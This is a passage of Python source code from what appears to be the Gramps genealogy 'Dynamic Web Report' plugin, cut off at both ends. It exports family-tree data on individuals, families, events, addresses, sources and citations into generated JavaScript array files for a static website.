dir_name is None:\n\t\t\tdir_name = get_curr_dir()\n\t\telif not os.path.isdir(dir_name):\n\t\t\tparent_dir = os.path.dirname(dir_name)\n\t\t\tif not os.path.isdir(parent_dir):\n\t\t\t\tmsg = _(\"Neither %(current)s nor %(parent)s are directories\") % \\\n\t\t\t\t\t {'current': dir_name, 'parent': parent_dir}\n\t\t\t\tself.user.notify_error(msg)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tos.mkdir(dir_name)\n\t\t\t\texcept IOError as value:\n\t\t\t\t\tmsg = _(\"Could not create the directory: %(path)s\") % {\n\t\t\t\t\t\t \"path\": dir_name + \"\\n\" + value[1]}\n\t\t\t\t\tself.user.notify_error(msg)\n\t\t\t\t\treturn\n\t\t\t\texcept:\n\t\t\t\t\tmsg = _(\"Could not create the directory: %(path)s\") % {\"path\": dir_name}\n\t\t\t\t\tself.user.notify_error(msg)\n\t\t\t\t\treturn\n\t\tconfig.set('paths.website-directory', os.path.dirname(self.target_path) + os.sep)\n\n\n\t\t# for use with discovering biological, half, and step siblings for use\n\t\t# in display_ind_parents()...\n\t\t# self.rel_class = 
get_relationship_calculator()\n\n\t\t#: List of images already copied\n\t\tself.images_copied = set()\n\n\t\t#: List of thumbnails already created\n\t\tself.thumbnail_created = set()\n\n\t\t#################################################\n\t\t# Pass 1 Build the lists of objects to be output\n\n\t\tself._build_obj_dict()\n\t\tself._sort_obj_dict()\n\n\t\t#################################################\n\t\t# Pass 2 Generate the web pages\n\t\t\n\t\twith self.user.progress(_(\"Dynamic Web Site Report\"), _(\"Exporting family tree data ...\"), 10) as step:\n\t\t\tself.created_files = []\n\t\t\t# Create directories\n\t\t\tfor dirname in [\"thumb\"] + ([\"image\"] if (self.copy_media) else []):\n\t\t\t\tdirpath = os.path.join(self.target_path, dirname)\n\t\t\t\tif (not os.path.isdir(dirpath)): os.mkdir(dirpath)\n\t\t\t# Copy web site files\n\t\t\tself.copy_template_files()\n\t\t\tstep()\n\t\t\t# Export database as Javascript files\n\t\t\tself._export_individuals()\n\t\t\tstep()\n\t\t\tself._export_families()\n\t\t\tstep()\n\t\t\tself._export_sources()\n\t\t\tself._export_citations()\n\t\t\tself._export_repositories()\n\t\t\tstep()\n\t\t\tself._export_places()\n\t\t\tstep()\n\t\t\tself._export_media()\n\t\t\tstep()\n\t\t\tself._export_surnames()\n\t\t\tstep()\n\t\t\t# Generate HTML files\n\t\t\tself._export_pages()\n\t\t\tstep()\n\t\t\t# Create GENDEX file\n\t\t\tself.build_gendex(self.obj_dict[Person])\n\t\t\tstep()\n\t\t\t# Create an archive file of the web site\n\t\t\tself.create_archive()\n\t\t\tstep()\n\n\n\tdef _export_individuals(self):\n\t\t\"\"\"\n\t\tExport individuals data in Javascript file\n\t\tThe individuals data is stored in the Javascript Array \"I\"\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'I' is sorted by person name\\n\"\n\t\t\t\"// 'I' gives for individual:\\n\"\n\t\t\t\"// - Gramps ID\\n\"\n\t\t\t\"// - The complete name\\n\"\n\t\t\t\"// - The short name\\n\"\n\t\t\t\"// - The names as a list of:\\n\"\n\t\t\t\"// [full name, type, title, nick, call, given, suffix, list of surnames, family nickname,\\n\"\n\t\t\t\"// notes, list of the name source citations index (in table 'C')]\\n\"\n\t\t\t\"// - The gender\\n\"\n\t\t\t\"// - The birth year in the form '1700', '?' (date unknown)\\n\"\n\t\t\t\"// - The birth place\\n\"\n\t\t\t\"// - The death year in the form '1700', '?' 
(date unknown), '' (not dead)\\n\"\n\t\t\t\"// - The death place\\n\"\n\t\t\t\"// - The death age\\n\"\n\t\t\t\"// - A list of events, with for each event:\\n\"\n\t\t\t\"// - The event name\\n\"\n\t\t\t\"// - The event date\\n\"\n\t\t\t\"// - The event date in ISO format (sortable)\\n\"\n\t\t\t\"// - The event place index (in table 'P'), -1 if none\\n\"\n\t\t\t\"// - The event description\\n\"\n\t\t\t\"// - The event text and notes (including event reference notes)\\n\"\n\t\t\t\"// - A list of the event media index, in the form:\\n\"\n\t\t\t\"// - media index (in table 'M')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the event source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of addresses, with for each address:\\n\"\n\t\t\t\"// - The address date\\n\"\n\t\t\t\"// - The address date in ISO format (sortable)\\n\"\n\t\t\t\"// - The address place in the form:\\n\"\n\t\t\t\"// [street, locality, parish, city, state, county, zip, country]\\n\"\n\t\t\t\"// - The address notes\\n\"\n\t\t\t\"// - A list of the address source citations index (in table 'C')\\n\"\n\t\t\t\"// - The person notes\\n\"\n\t\t\t\"// - A list of the person media references, in the form:\\n\"\n\t\t\t\"// - media index (in table 'M')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the person source citations index (in table 'C')\\n\"\n\t\t\t\"// - The list of the person attributes in the form:\\n\"\n\t\t\t\"// [attribute, value, note, list of citations]\\n\"\n\t\t\t\"// - The list of the person URL in the form:\\n\"\n\t\t\t\"// [type, url, description]\\n\"\n\t\t\t\"// - A list of partners families index (in table 'F')\\n\"\n\t\t\t\"// - A list of parents families in the form:\\n\"\n\t\t\t\"// [index (in table 'F'), relation to father, relation to mother, notes, list of citations]\\n\"\n\t\t\t\"// - A list of associations in the form:\\n\"\n\t\t\t\"// [person index (in table 'I'), relationship, notes, list of citations (in table 'C')]\\n\"\n\t\t\t\"I = [\")\n\t\tsep = \"\\n\"\n\t\tperson_list = list(self.obj_dict[Person].keys())\n\t\tperson_list.sort(key = lambda x: self.obj_dict[Person][x][OBJDICT_INDEX])\n\t\tfor person_handle in person_list:\n\t\t\tperson = self.database.get_person_from_handle(person_handle)\n\t\t\tsw.write(sep)\n\t\t\tsw.write(\"[\\\"\" + self.obj_dict[Person][person_handle][OBJDICT_GID] + \"\\\",\")\n\t\t\t# Names\n\t\t\tname = self.get_name(person) or \"\"\n\t\t\tsw.write(\"\\\"\" + script_escape(name) + \"\\\",\")\n\t\t\tname = self.get_short_name(person) or \"\"\n\t\t\tsw.write(\"\\\"\" + script_escape(name) + \"\\\",\\n\")\n\t\t\tsw.write(self.get_name_data(person) + \",\\n\")\n\t\t\t# Gender\n\t\t\tgender = \"\"\n\t\t\tif (person.get_gender() == Person.MALE): gender = \"M\"\n\t\t\tif (person.get_gender() == Person.FEMALE): gender = \"F\"\n\t\t\tif (person.get_gender() == Person.UNKNOWN): gender = \"U\"\n\t\t\tsw.write(\"\\\"\" + gender + \"\\\",\")\n\t\t\t# Years\n\t\t\tsw.write(\"\\\"\" + self.get_birth_year(person) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\" + self.get_birth_place(person) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\" + self.get_death_year(person) + 
\"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\" + self.get_death_place(person) + \"\\\",\\n\")\n\t\t\t# Age at death\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_death_age(person)) + \"\\\",\\n\")\n\t\t\t# Events\n\t\t\tsw.write(\"[\\n\" + self._data_events(person) + \"\\n],\\n\")\n\t\t\t# Addresses\n\t\t\tsw.write(\"[\\n\" + self._data_addresses(person) + \"\\n],\\n\")\n\t\t\t# Get individual notes\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_notes_text(person)) + \"\\\",\\n\")\n\t\t\t# Get individual media\n\t\t\tsw.write(self._data_media_reference_index(person))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get individual sources\n\t\t\tsw.write(self._data_source_citation_index(person))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get individual attributes\n\t\t\tsw.write(self._data_attributes(person))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get individual URL\n\t\t\tsw.write(self._data_url_list(person))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Families (partners)\n\t\t\tsw.write(self._data_families_index(person))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Families (parents)\n\t\t\tsw.write(self._data_parents_families_index(person))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Associations\n\t\t\tsw.write(self._data_associations(person))\n\t\t\tsw.write(\"\\n]\")\n\t\t\t#\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_indi.js\", sw.getvalue())\n\n\n\tdef get_name_data(self, person):\n\t\tprimary_name = person.get_primary_name()\n\t\tall_names = [primary_name] + person.get_alternate_names()\n\t\tfirst_name = primary_name.get_first_name()\n\t\ttext = \"[\"\n\t\tsep = \"\"\n\t\tfor name in all_names:\n\t\t\ttext += sep + \"[\"\n\t\t\tname.set_display_as(self.name_format)\n\t\t\tpname = _nd.display_name(name)\n\t\t\ttext += \"\\\"\" + script_escape(pname) + \"\\\",\"\n\t\t\t# Type\n\t\t\ttext += \"\\\"\" + script_escape(str(name.get_type())) + \"\\\",\"\n\t\t\t# Title\n\t\t\ttitle = name.get_title() or \"\"\n\t\t\ttext += \"\\\"\" + script_escape(str(title)) + \"\\\",\"\n\t\t\t# Nickname\n\t\t\tnick_name = name.get_nick_name()\n\t\t\tif (nick_name == first_name or not nick_name): nick_name = \"\"\n\t\t\ttext += \"\\\"\" + script_escape(str(nick_name)) + \"\\\",\"\n\t\t\t# Callname\n\t\t\tcall_name = name.get_call_name()\n\t\t\tif (call_name == first_name or not call_name): call_name = \"\"\n\t\t\ttext += \"\\\"\" + script_escape(str(call_name)) + \"\\\",\"\n\t\t\t# Given\n\t\t\tgiven = name.get_first_name() or \"\"\n\t\t\ttext += \"\\\"\" + script_escape(str(given)) + \"\\\",\"\n\t\t\t# Suffix\n\t\t\tsuffix = name.get_suffix() or \"\"\n\t\t\ttext += \"\\\"\" + script_escape(str(suffix)) + \"\\\",\"\n\t\t\t# Surnames\n\t\t\tsurnames = name.get_surname_list()\n\t\t\ttext += \"[\" + \",\".join([\n\t\t\t\t\"\\\"\" + script_escape(str(surname.get_surname() or \"\")) + \"\\\"\"\n\t\t\t\tfor surname in surnames]) + \"],\"\n\t\t\t# Family nickname\n\t\t\tfnick = name.get_family_nick_name() or \"\"\n\t\t\ttext += \"\\\"\" + script_escape(str(fnick)) + \"\\\",\"\n\t\t\t# Get name date\n\t\t\tdatetext = format_date(name.date) or \"\"\n\t\t\ttext += \"\\\"\" + script_escape(datetext) + \"\\\",\"\n\t\t\t# Get name notes\n\t\t\ttext += \"\\\"\" + script_escape(self.get_notes_text(name)) + \"\\\",\"\n\t\t\t# Get name sources\n\t\t\ttext += self._data_source_citation_index(name) + \"]\"\n\t\t\tsep = \",\"\n\t\ttext += \"]\"\n\t\treturn(text)\n\n\n\tdef get_name_object(self, person, maiden_name = None):\n\t\t\"\"\"\n\t\tReturn person's name, unless maiden_name given, unless married_name\n\t\tlisted.\n\t\t@param: person -- 
person object from database\n\t\t@param: maiden_name -- Female's family surname\n\t\t\"\"\"\n\t\t# Get all of a person's names\n\t\tprimary_name = person.get_primary_name()\n\t\tmarried_name = None\n\t\tnames = [primary_name] + person.get_alternate_names()\n\t\tfor name in names:\n\t\t\tif int(name.get_type()) == NameType.MARRIED:\n\t\t\t\tmarried_name = name\n\t\t\t\tbreak # use first\n\t\t# Now, decide which to use:\n\t\tif maiden_name is not None:\n\t\t\tif married_name is not None:\n\t\t\t\tname = Name(married_name)\n\t\t\telse:\n\t\t\t\tname = Name(primary_name)\n\t\t\t\tsurname_obj = name.get_primary_surname()\n\t\t\t\tsurname_obj.set_surname(maiden_name)\n\t\telse:\n\t\t\tname = Name(primary_name)\n\t\treturn(name)\n\n\n\tdef get_name(self, person, maiden_name = None):\n\t\tname = self.get_name_object(person, maiden_name)\n\t\tname.set_display_as(self.name_format)\n\t\treturn _nd.display_name(name)\n\n\n\tdef get_short_name(self, person, maiden_name = None):\n\t\tname = self.get_name_object(person, maiden_name)\n\t\tname.set_display_as(self.short_name_format)\n\t\treturn _nd.display_name(name)\n\n\n\tdef _export_families(self):\n\t\t\"\"\"\n\t\tExport families data in Javascript file\n\t\tThe families data is stored in the Javascript Array \"F\"\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'F' is sorted by family full name\\n\"\n\t\t\t\"// 'F' gives for each family:\\n\"\n\t\t\t\"// - Gramps ID\\n\"\n\t\t\t\"// - The family full name\\n\"\n\t\t\t\"// - The family union type\\n\"\n\t\t\t\"// - The marriage year in the form '1700', '?' (unknown), or '' (not married)\\n\"\n\t\t\t\"// - The marriage place\\n\"\n\t\t\t\"// - A list of events, with for each event:\\n\"\n\t\t\t\"// - The event name\\n\"\n\t\t\t\"// - The event date\\n\"\n\t\t\t\"// - The event date in ISO format (sortable)\\n\"\n\t\t\t\"// - The event place index (in table 'P'), -1 if none\\n\"\n\t\t\t\"// - The event description\\n\"\n\t\t\t\"// - The event text and notes (including event reference notes)\\n\"\n\t\t\t\"// - A list of the event media references, in the form:\\n\"\n\t\t\t\"// - media index (in table 'M')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the event source citations index (in table 'C')\\n\"\n\t\t\t\"// - The family notes\\n\"\n\t\t\t\"// - A list of the family media references, in the form:\\n\"\n\t\t\t\"// - media index (in table 'M')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the family source citations index (in table 'C')\\n\"\n\t\t\t\"// - The list of the family attributes in the form:\\n\"\n\t\t\t\"// [attribute, value, note, list of citations]\\n\"\n\t\t\t\"// - A list of spouses index (in table 'I')\\n\"\n\t\t\t\"// - A list of children in the form:\\n\"\n\t\t\t\"// [index (in table 'I'), relation to father, relation to mother, notes, list of citations]\\n\"\n\t\t\t\"F = [\")\n\t\tsep = \"\\n\"\n\t\tfamily_list = list(self.obj_dict[Family].keys())\n\t\tfamily_list.sort(key = lambda x: self.obj_dict[Family][x][OBJDICT_INDEX])\n\t\tfor family_handle in family_list:\n\t\t\tfamily = self.database.get_family_from_handle(family_handle)\n\t\t\tsw.write(sep)\n\t\t\tsw.write(\"[\\\"\" + self.obj_dict[Family][family_handle][OBJDICT_GID] + \"\\\",\")\n\t\t\t# Names\n\t\t\tname = self.get_family_name(family) or \"\"\n\t\t\tsw.write(\"\\\"\" + script_escape(name) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\" + script_escape(str(family.get_relationship())) + \"\\\",\\n\")\n\t\t\t# Years\n\t\t\tsw.write(\"\\\"\" + self.get_marriage_year(family) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\" + self.get_marriage_place(family) + \"\\\",\\n\")\n\t\t\t# Events\n\t\t\tsw.write(\"[\\n\" + self._data_events(family) + \"\\n],\\n\")\n\t\t\t# Get family notes\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_notes_text(family)) + \"\\\",\\n\")\n\t\t\t# Get family media\n\t\t\tsw.write(self._data_media_reference_index(family))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get family sources\n\t\t\tsw.write(self._data_source_citation_index(family))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get family attributes\n\t\t\tsw.write(self._data_attributes(family))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Partners\n\t\t\tsw.write(self._data_partners_index(family))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Children\n\t\t\tsw.write(self._data_children_index(family))\n\t\t\tsw.write(\"\\n]\")\n\t\t\t#\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_fam.js\", sw.getvalue())\n\n\n\tdef _data_events(self, object):\n\t\t\"\"\"\n\t\tBuild events data related to L{object} in a string representing a Javascript Array\n\t\tL{object} could be: a person or a family\n\t\t@return: events as a string representing a Javascript Array\n\t\t\"\"\"\n\t\t# Builds an event list that gives for each event:\n\t\t# - Gramps ID\n\t\t# - The event name\n\t\t# - The event date\n\t\t# - The event date in ISO format (sortable)\n\t\t# - The event place index (in table 'P'), -1 if none\n\t\t# - The event description\n\t\t# - The event text and notes (including event reference notes)\n\t\t# - A list of the event media index, in the form:\n\t\t# - media index (in table 'M')\n\t\t# - media thumbnail path\n\t\t# - [x1, y1, x2, y2] of the media reference\n\t\t# - notes of the media reference\n\t\t# - list of the media reference source citations index (in table 'C')\n\t\t# - A list of the event source citations index (in table 'C')\n\t\tevent_ref_list = object.get_event_ref_list()\n\t\tif not event_ref_list: return(\"\")\n\t\trows = []\n\t\tfor event_ref in event_ref_list:\n\t\t\tif (event_ref.ref not in self.obj_dict[Event]): continue\n\t\t\tevent = self.database.get_event_from_handle(event_ref.ref)\n\t\t\tif (not event): continue\n\t\t\ttrow = \"\\t[\"\n\t\t\tevt_type = str(event.get_type())\n\t\t\tevent_role = event_ref.get_role()\n\t\t\tif (event_role != EventRoleType.PRIMARY and event_role != EventRoleType.FAMILY):\n\t\t\t\tevt_type += \" (%s)\" % event_role\n\t\t\tplace_index = -1\n\t\t\tplace_handle = event.get_place_handle()\n\t\t\tif (place_handle and (place_handle in self.obj_dict[Place])):\n\t\t\t\tplace_index = self.obj_dict[Place][place_handle][OBJDICT_INDEX]\n\t\t\tevt_desc = event.get_description()\n\t\t\ttrow += \"\\\"\" + self.obj_dict[Event][event_ref.ref][OBJDICT_GID] + \"\\\",\"\n\t\t\ttrow += \"\\\"\" + script_escape(html_escape(evt_type)) + \"\\\",\"\n\t\t\tevt_date = format_date(event.get_date_object())\n\t\t\ttrow += \"\\\"\" + script_escape(html_escape(evt_date)) + \"\\\",\"\n\t\t\tevt_date = format_date(event.get_date_object(), True)\n\t\t\ttrow += \"\\\"\" + script_escape(html_escape(evt_date)) + \"\\\",\"\n\t\t\ttrow += str(place_index) + \",\"\n\t\t\tif (evt_desc is None): evt_desc = \"\"\n\t\t\ttrow += \"\\\"\" + script_escape(html_escape(evt_desc)) + \"\\\",\"\n\t\t\t# Get event notes\n\t\t\tnotelist = event.get_note_list()\n\t\t\tnotelist.extend(event_ref.get_note_list())\n\t\t\tattrlist = event.get_attribute_list()\n\t\t\tattrlist.extend(event_ref.get_attribute_list())\n\t\t\ttrow += \"\\\"\" + script_escape(self.get_notes_attributes_text(notelist, attrlist)) + \"\\\",\"\n\t\t\t# Get event media\n\t\t\ttrow += self._data_media_reference_index(event)\n\t\t\ttrow += \",\"\n\t\t\t# Get event sources\n\t\t\tcitationlist = event.get_citation_list()\n\t\t\tcitationlist.extend(event_ref.get_citation_list())\n\t\t\tfor attr in attrlist: citationlist.extend(attr.get_citation_list())\n\t\t\ttrow += self._data_source_citation_index_from_list(citationlist)\n\t\t\t#\n\t\t\ttrow += \"]\"\n\t\t\trows.append(trow)\n\t\treturn(\",\\n\".join(rows))\n\n\n\tdef _data_addresses(self, object):\n\t\t\"\"\"\n\t\tExport addresses data related to L{object} in a string representing a Javascript Array\n\t\tL{object} could be: a person or a repository\n\t\t@return: addresses as a string representing a Javascript Array\n\t\t\"\"\"\n\t\t# Builds an address list that gives for each address:\n\t\t# - The address date\n\t\t# - The address date in ISO format (sortable)\n\t\t# - The address place in the form:\n\t\t# [street, locality, parish, city, state, county, zip, country]\n\t\t# - The address notes\n\t\t# - A list of the address source citations index (in table 'C')\n\t\tif (not self.inc_addresses): return(\"\")\n\t\taddrlist = object.get_address_list()\n\t\tif not addrlist: return(\"\")\n\t\trows = []\n\t\tfor addr in addrlist:\n\t\t\ttext = \"\\t[\"\n\t\t\taddr_date = format_date(addr.get_date_object())\n\t\t\ttext += \"\\\"\" + script_escape(html_escape(addr_date)) + \"\\\",\"\n\t\t\taddr_date = format_date(addr.get_date_object(), True)\n\t\t\ttext += \"\\\"\" + script_escape(html_escape(addr_date)) + \"\\\",\"\n\t\t\taddr_data = [\n\t\t\t\taddr.get_street(),\n\t\t\t\taddr.get_locality(),\n\t\t\t\t\"\",\n\t\t\t\taddr.get_city(),\n\t\t\t\taddr.get_state(),\n\t\t\t\taddr.get_county(),\n\t\t\t\taddr.get_postal_code(),\n\t\t\t\taddr.get_country(),\n\t\t\t\taddr.get_phone(),\n\t\t\t]\n\t\t\ttext += \"[\\\"\" + \"\\\",\\\"\".join([script_escape(data) for data in addr_data]) + \"\\\"],\"\n\t\t\t# Get address notes\n\t\t\ttext += \"\\\"\" + script_escape(self.get_notes_text(addr)) + \"\\\",\"\n\t\t\t# Get address sources\n\t\t\ttext += self._data_source_citation_index(addr) + \"]\"\n\t\t\trows.append(text)\n\t\treturn(\",\\n\".join(rows))\n\n\n\tdef _export_sources(self):\n\t\t\"\"\"\n\t\tExport sources data in Javascript file\n\t\tThe sources data is stored in the Javascript Array \"S\"\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'S' is sorted by source title\\n\"\n\t\t\t\"// 'S' gives for each source:\\n\"\n\t\t\t\"// - Gramps ID\\n\"\n\t\t\t\"// - The source title\\n\"\n\t\t\t\"// - The source text (author, etc.)\\n\"\n\t\t\t\"// - The source notes\\n\"\n\t\t\t\"// - A list of the source media references, in the form:\\n\"\n\t\t\t\"// - media index (in table 'M')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of 
the citations index (in table 'C') referencing this source\\n\"\n\t\t\t\"// - A list of the repositories for this source, in the form:\\n\"\n\t\t\t\"// - repository index (in table 'R')\\n\"\n\t\t\t\"// - media type\\n\"\n\t\t\t\"// - call number\\n\"\n\t\t\t\"// - notes of the repository reference\\n\"\n\t\t\t\"// - The list of the sources attributes in the form:\\n\"\n\t\t\t\"// [attribute, value, note, list of citations]\\n\"\n\t\t\t\"S = [\")\n\t\tsep = \"\\n\"\n\t\tsource_list = list(self.obj_dict[Source])\n\t\tif (not self.inc_sources): source_list = []\n\t\tsource_list.sort(key = lambda x: self.obj_dict[Source][x][OBJDICT_INDEX])\n\t\tfor source_handle in source_list:\n\t\t\tsource = self.database.get_source_from_handle(source_handle)\n\t\t\tsw.write(sep)\n\t\t\tsw.write(\"[\\\"\" + self.obj_dict[Source][source_handle][OBJDICT_GID] + \"\\\",\")\n\t\t\ttitle = source.get_title() or \"\"\n\t\t\tsw.write(\"\\\"\" + script_escape(html_escape(title)) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\")\n\t\t\tfor (label, value) in [\n\t\t\t\t(_(\"Author\"), source.get_author()),\n\t\t\t\t(_(\"Abbreviation\"), source.get_abbreviation()),\n\t\t\t\t(_(\"Publication information\"), source.get_publication_info())]:\n\t\t\t\tif value:\n\t\t\t\t\thtml = Html(\"p\") + Html(\"b\", label + \": \") + value\n\t\t\t\t\tsw.write(script_escape(html_text(html)))\n\t\t\tsw.write(\"\\\",\\n\")\n\t\t\t# Get source notes\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_notes_text(source)) + \"\\\",\\n\")\n\t\t\t# Get source media\n\t\t\tsw.write(self._data_media_reference_index(source))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get source citations\n\t\t\tsw.write(self._data_bkref_index(Source, source_handle, Citation))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get repositories references\n\t\t\tsw.write(self._data_repo_reference_index(source))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get source attributes\n\t\t\tif (DWR_VERSION_410):\n\t\t\t\tsw.write(self._data_attributes_src(source))\n\t\t\telse:\n\t\t\t\tsw.write(\"[]\")\n\t\t\tsw.write(\"\\n]\")\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_sour.js\", sw.getvalue())\n\n\n\tdef _export_citations(self):\n\t\t\"\"\"\n\t\tExport citations data in Javascript file\n\t\tThe citations data is stored in the Javascript Array \"C\"\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'C' gives for each source citation:\\n\"\n\t\t\t\"// - Gramps ID\\n\"\n\t\t\t\"// - The source index (in table 'S')\\n\"\n\t\t\t\"// - The citation text (page, etc.)\\n\"\n\t\t\t\"// - The citation notes\\n\"\n\t\t\t\"// - A list of the citation media references, in the form:\\n\"\n\t\t\t\"// - media index (in table 'M')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - A list of the person index (in table 'I') referencing this citation\\n\"\n\t\t\t\"// (including the person events referencing this citation)\\n\"\n\t\t\t\"// - A list of the family index (in table 'F') referencing this citation\\n\"\n\t\t\t\"// (including the family events referencing this citation)\\n\"\n\t\t\t\"// - A list of the media index (in table 'M') referencing this citation\\n\"\n\t\t\t\"// (including the media references referencing this citation)\\n\"\n\t\t\t\"// - A list of the place index (in table 'P') referencing this citation\\n\"\n\t\t\t\"// (including the media references referencing this citation)\\n\"\n\t\t\t\"// - A list of the repository index (in table 'R') referencing this 
citation\\n\"\n\t\t\t\"C = [\")\n\t\tsep = \"\\n\"\n\t\tcitation_list = list(self.obj_dict[Citation])\n\t\tif (not self.inc_sources): citation_list = []\n\t\tcitation_list.sort(key = lambda x: self.obj_dict[Citation][x][OBJDICT_INDEX])\n\t\tfor citation_handle in citation_list:\n\t\t\tcitation = self.database.get_citation_from_handle(citation_handle)\n\t\t\tsource_handle = citation.get_reference_handle()\n\t\t\tsw.write(sep)\n\t\t\tsw.write(\"[\\\"\" + self.obj_dict[Citation][citation_handle][OBJDICT_GID] + \"\\\",\")\n\t\t\tsw.write(str(self.obj_dict[Source][source_handle][OBJDICT_INDEX])+ \",\\n\")\n\t\t\tsw.write(\"\\\"\")\n\t\t\tconfidence = citation.get_confidence_level()\n\t\t\tif ((confidence in conf_strings) and confidence != Citation.CONF_NORMAL):\n\t\t\t\tconfidence = _(conf_strings[confidence])\n\t\t\telse:\n\t\t\t\tconfidence = None\n\t\t\tfor (label, value) in [\n\t\t\t\t(_(\"Date\"), format_date(citation.get_date_object())),\n\t\t\t\t(_(\"Page\"), citation.get_page()),\n\t\t\t\t(_(\"Confidence\"), confidence),\n\t\t\t]:\n\t\t\t\tif value:\n\t\t\t\t\thtml = Html(\"p\") + Html(\"b\", label + \": \") + value\n\t\t\t\t\tsw.write(script_escape(html_text(html)))\n\t\t\tsw.write(\"\\\",\\n\")\n\t\t\t# Get citation notes\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_notes_text(citation)) + \"\\\",\\n\")\n\t\t\t# Get citation media\n\t\t\tsw.write(self._data_media_reference_index(citation))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get references\n\t\t\tsw.write(self._data_bkref_index(Citation, citation_handle, Person))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_bkref_index(Citation, citation_handle, Family))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_bkref_index(Citation, citation_handle, MediaObject))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_bkref_index(Citation, citation_handle, Place))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_bkref_index(Citation, citation_handle, Repository))\n\t\t\tsw.write(\"\\n]\")\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_cita.js\", sw.getvalue())\n\n\n\tdef _export_repositories(self):\n\t\t\"\"\"\n\t\tExport repositories data in Javascript file\n\t\tThe repositories data is stored in the Javascript Array \"R\"\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'R' is sorted by repository name\\n\"\n\t\t\t\"// 'R' gives for each repository:\\n\"\n\t\t\t\"// - Gramps ID\\n\"\n\t\t\t\"// - The repository name\\n\"\n\t\t\t\"// - The repository type\\n\"\n\t\t\t\"// - A list of addresses, with for each address:\\n\"\n\t\t\t\"// - The address date\\n\"\n\t\t\t\"// - The address date in ISO format (sortable)\\n\"\n\t\t\t\"// - The address place in the form:\\n\"\n\t\t\t\"// [street, locality, parish, city, state, county, zip, country]\\n\"\n\t\t\t\"// - The address notes\\n\"\n\t\t\t\"// - A list of the address source citations index (in table 'C')\\n\"\n\t\t\t\"// - The repository notes\\n\"\n\t\t\t\"// - The list of the repository URL in the form:\\n\"\n\t\t\t\"// [type, url, description]\\n\"\n\t\t\t\"// - A list of the sources referencing this repository, in the form:\\n\"\n\t\t\t\"// - source index (in table 'S')\\n\"\n\t\t\t\"// - media type\\n\"\n\t\t\t\"// - call number\\n\"\n\t\t\t\"// - notes of the repository reference\\n\"\n\t\t\t\"R = [\")\n\t\tsep = \"\\n\"\n\t\trepo_list = 